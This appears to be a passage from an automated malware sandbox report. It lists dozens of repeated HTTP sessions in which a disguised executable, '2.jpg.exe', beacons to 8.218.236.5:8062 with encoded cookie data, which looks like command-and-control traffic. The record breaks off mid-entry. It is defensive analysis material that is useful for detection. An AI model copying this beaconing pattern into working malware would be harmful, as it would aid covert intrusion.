Apr 19, 2024 09:51:19.407246113 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:19.735529900 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:19 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	49838	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:20.178515911 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:20.512835026 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:20 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	49839	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:20.947350979 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:21.269366980 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:21 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	49840	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:21.689830065 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:22.004308939 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:21 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	49841	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:22.435525894 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:22.758346081 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:22 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	49842	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:23.205575943 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:23.534665108 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:23 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	49843	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:23.995028973 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:24.334868908 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:24 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	49844	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:24.781358004 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:25.121988058 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:24 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	49845	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:25.557066917 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:25.878838062 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:25 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	49846	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:26.305483103 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:26.626176119 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:26 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	49847	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:27.073419094 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:27.412439108 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:27 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	49848	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:27.835165024 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:28.154647112 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:27 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	49849	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:28.587287903 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:28.909405947 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:28 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	49850	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:29.333817005 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:29.652666092 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:29 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	49851	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:30.081418037 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:30.394144058 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:30 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.4	49852	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:30.824151039 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:31.148049116 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:30 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.4	49853	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:31.564205885 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:31.878711939 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:31 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.4	49854	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:32.298789024 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:32.612875938 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:32 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.4	49855	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:33.039524078 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:33.360610962 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:33 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.4	49856	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:33.785928965 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:34.102185965 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:33 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.4	49857	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:34.543570042 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:34.868395090 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:34 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.4	49858	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:35.306139946 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:35.625766039 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:35 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.4	49859	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:36.685766935 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:37.023093939 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:36 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.4	49860	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:37.448117971 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:37.771071911 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:37 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.4	49861	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:38.198276997 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:38.521215916 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:38 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.4	49862	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:38.943152905 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:39.261399031 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:39 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.4	49863	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:39.696171999 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:40.015750885 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:39 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.4	49864	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:40.460066080 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:40.786341906 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:40 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.4	49865	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:41.210257053 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:41.529601097 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:41 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.4	49866	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
